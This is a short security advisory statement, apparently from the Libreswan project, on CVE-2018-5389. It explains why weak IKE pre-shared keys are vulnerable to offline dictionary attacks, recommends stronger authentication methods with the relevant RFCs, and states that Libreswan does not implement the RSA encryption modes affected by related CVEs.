CVE-2018-5389

Statement

PSK based authentication should only be used when the randomness and confidentially of the shared secret can be guaranteed. PSKs should also not be used as Group Secrets, where the security of the PSK is only as strong as the weakest participant in the group. Public Key or EAP authentication methods should be used whenever possible. If PSK must be used, it is essential to ensure the shared secret has a high degree of randomness and is not derived from a password with low entropy, as specified clearly in the IKEv2 specification in RFC 7296.

To use passwords for authentication of IKE/IPsec peers, the IKEv2 protocol supports various methods that are not based on (inherently weak) PSKs and which are not vulnerable to offline dictionary attacks:

RFC 5998: EAP-Only Authentication in IKEv2
RFC 6617: Secure Pre-Shared Key (PSK) Authentication for IKE
RFC 6631: Password Authenticated Connection Establishment with IKEv2
RFC 6628: Efficient Augmented Password-Only Authentication and Key Exchange for IKEv2

As implementations supporting IKE assume the security of provided PSKs, and no mechanism within the protocol allows for password-stretching, we do not anticipate any software fixes becoming available.

The research paper that describes the problems of using weak PSKs also listed another security issue with respect to RSA keys that has different CVE numbers. Libreswan is not vulnerable to those attacks as it requires IKEv1 using either ("Encryption with RSA" (value 5) or "Revised encryption with RSA" (value 6). Both of these modes are not implemented by libreswan.